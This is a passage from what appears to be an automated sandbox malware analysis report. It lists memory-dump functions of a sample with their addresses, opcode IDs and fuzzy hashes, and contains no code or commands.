                                                      Function 060ECCA0 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4137359761.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_60e0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 29eb670308eeef9d187e60c65e0950ae5c56b32b82fa4da3f6ea4536c734a42b
                                                      • Instruction ID: 2997a505c8649cf76d32b23675f8b24f008a43b064f06506e78822d11e27ea2d
                                                      • Opcode Fuzzy Hash: 29eb670308eeef9d187e60c65e0950ae5c56b32b82fa4da3f6ea4536c734a42b
                                                      • Instruction Fuzzy Hash: 8BC19E74E01228CFDB54DFA5D994BADBBF2EF89300F2080AAD419AB354DB355A81CF50
                                                      Function 060ED0F8 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4137359761.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_60e0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4722c1152da325724ce0672723dd411fc8b48cfcc71ba7a6b61b71d1517a092
                                                      • Instruction ID: 248658317cfb04cddab1c185af7d9612fe0cc921669381b3ab9ad4c4152f45d5
                                                      • Opcode Fuzzy Hash: c4722c1152da325724ce0672723dd411fc8b48cfcc71ba7a6b61b71d1517a092
                                                      • Instruction Fuzzy Hash: 93C1AE74E01228CFDB54DFA5D984B9DBBF2EF89300F2080AAD419AB364DB355A81CF50
                                                      Function 060ED550 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4137359761.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_60e0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6fe4694193774fbbcb56b2387f9e42b957962d4b3251058df7f9284e86f7f372
                                                      • Instruction ID: bf166594d64357a92b73475cf672206de1de74ca320ef763159cce15327092e2
                                                      • Opcode Fuzzy Hash: 6fe4694193774fbbcb56b2387f9e42b957962d4b3251058df7f9284e86f7f372
                                                      • Instruction Fuzzy Hash: 4FC19E74E01228CFDB54DFA5D994B9DBBF2EF89300F2080AAD419AB355DB355A81CF50
                                                      Function 060ED9A8 Relevance: .3, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4137359761.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_60e0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a408ce20b21fdf9aa668a55f9cccfbeb8870f0285dc68012a7a88883a209853f
                                                      • Instruction ID: 39499cb93c2015da3c8c56b022aefb638484647d806dbc5f54a4fef787cfefd6
                                                      • Opcode Fuzzy Hash: a408ce20b21fdf9aa668a55f9cccfbeb8870f0285dc68012a7a88883a209853f
                                                      • Instruction Fuzzy Hash: 5DC19E74E01228CFDB54DFA5D994B9DBBF2EF89300F2081A9D409AB395DB355A81CF50
                                                      Function 060E0673 Relevance: .2, Instructions: 193COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4137359761.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_60e0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 61ec4bc82428ec1024b5c62b204527f9c4aedb48bcf22f93e4c554e31f426c3f
                                                      • Instruction ID: 0f5134735f46acfeb414b07d2265cbc82e918fba599ed8bd380cd2ab0f88ca25
                                                      • Opcode Fuzzy Hash: 61ec4bc82428ec1024b5c62b204527f9c4aedb48bcf22f93e4c554e31f426c3f
                                                      • Instruction Fuzzy Hash: E6A19B74E01228CFDB64DF24C994BDABBB2BB89301F1084EAD54EA7254DB719E80CF51
                                                      Function 023BF2C0 Relevance: .2, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2592c2aa3f3806ab10ee8d4c9afecbf223de2407950377c1f168392df948296c
                                                      • Instruction ID: 4b96c726d1f195819e947e8ecadd7138fd436b40a889c937c5672de667ad9031
                                                      • Opcode Fuzzy Hash: 2592c2aa3f3806ab10ee8d4c9afecbf223de2407950377c1f168392df948296c
                                                      • Instruction Fuzzy Hash: 1D511770E01208CBDB15DFA8D9847EDB7B2BF89300F14E529E504BBA98C7759885CF50
                                                      Function 023BF4AC Relevance: .1, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5c889625c56bac08be05e4d7fe91d6c59bfe6857278f120e0e11c7f3d06538a1
                                                      • Instruction ID: a4148ef5b03526d89fe6890998b4d1d6bb0c808d52bdaea90f3ca2589df2b95c
                                                      • Opcode Fuzzy Hash: 5c889625c56bac08be05e4d7fe91d6c59bfe6857278f120e0e11c7f3d06538a1
                                                      • Instruction Fuzzy Hash: 6D510470E01208CBDB16EFA8D8847EDBBB6FF49304F20A519E505BBA85C7359881CF50
                                                      Function 060E0853 Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4137359761.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_60e0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62a75ed3b3bbbb296ba2477258ceabe3dbaac729623cd8325a1d240e1236a4e9
                                                      • Instruction ID: e38439a278b506868436f2a01bd96b89733849240b8c1b1e269089b72a2eb64a
                                                      • Opcode Fuzzy Hash: 62a75ed3b3bbbb296ba2477258ceabe3dbaac729623cd8325a1d240e1236a4e9
                                                      • Instruction Fuzzy Hash: 1E51A074A41228CFCB69DF24C954BDAB7B2BF4A301F5095E9D40AA7354CB719E81CF50
                                                      Function 023B6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \;dq$\;dq$\;dq$\;dq
                                                      • API String ID: 0-1855092343
                                                      • Opcode ID: 02ed163c1466080cf30bf4d90d13ea1e5c61bdacecb4a1eccf0e7c71f1ba4f40
                                                      • Instruction ID: 1fdd036dfb9e13ac4f834beaa471c546533f3265208b9b69a20bd7d07710dea1
                                                      • Opcode Fuzzy Hash: 02ed163c1466080cf30bf4d90d13ea1e5c61bdacecb4a1eccf0e7c71f1ba4f40
                                                      • Instruction Fuzzy Hash: D80171317101258FCB2A8E2DC441A6677FEBFCC7657154169EA05CB7A2DB31DC41CB50